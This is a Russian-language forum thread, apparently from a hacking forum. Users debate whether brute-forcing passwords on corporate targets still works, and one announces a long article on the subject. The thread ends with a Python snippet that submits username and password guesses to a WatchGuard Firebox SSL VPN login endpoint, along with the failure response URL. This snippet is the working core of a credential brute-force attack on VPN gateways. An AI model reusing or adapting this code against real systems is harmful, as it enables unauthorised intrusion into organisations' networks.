- Автор темы
- Добавить закладку
- #21
весьма спорное утверждениеБрутить неактуально.
весьма спорное утверждениеБрутить неактуально.
Ну это лишь вопрос шума при (неудачной) проверке...Прощё проеверить на реальных таргетах, к которым есть доступ.
Вот ещё виртуалку поднимать...
ну в серьёзных конторах:а почему?
- стали ответственнее админы?
- требования корпоративных стандартов на пароли? (инструкции человеку)
- автопроверка сложности скриптами? (рэндомизация, блокировка простого - софт?)
- ИИ перепроверяет настройки политик безопасности, настройки EDR, etc?
или всё вкупе?
статья готова, начинаю заливать. для самых нетерпеливых приложу пдфку, ну не умею я ваши маркдауны готовить. LaTex foreverя там анонсировал статью про брут. Получилось уже больше 20 страниц. Сегодня выложить постараюсь.
Посмотреть вложение 111338
статья готова, начинаю заливать. для самых нетерпеливых приложу пдфку, ну не умею я ваши маркдауны готовить. LaTex forever

пдфка почти 5 мб, во вложение не хочет крепиться
Tick Tack, Tic Tack...
можно временно сюда залить https:// wasabi. com/ вроде как месяц триала даютпдфка почти 5 мб, во вложение не хочет крепиться
куда лучше залить?
как насчёт дамаги которая либа (ещё и форум появился там) ? тут почему-то прячут на неё ссылки. туда можно заливать по идее, я туда PDF книги заливаю обычно.куда лучше залить?
https://{target}/wgcgi.cgidata = {'fw_username': login, 'fw_password': password, 'fw_domain': 'Firebox-DB', 'submit': 'Login', 'action': 'sslvpn_web_logon', 'fw_logon_type': 'logon', 'lang': 'en-US'}
ses = requests.Session()
resp = ses.post(f'https://{target}/wgcgi.cgi', verify=False, data=data)
print(resp.url)
https://{target}/sslvpn_logon.shtml?errcode=501
https://{target}/sslvpn_logon.shtml?errcode=501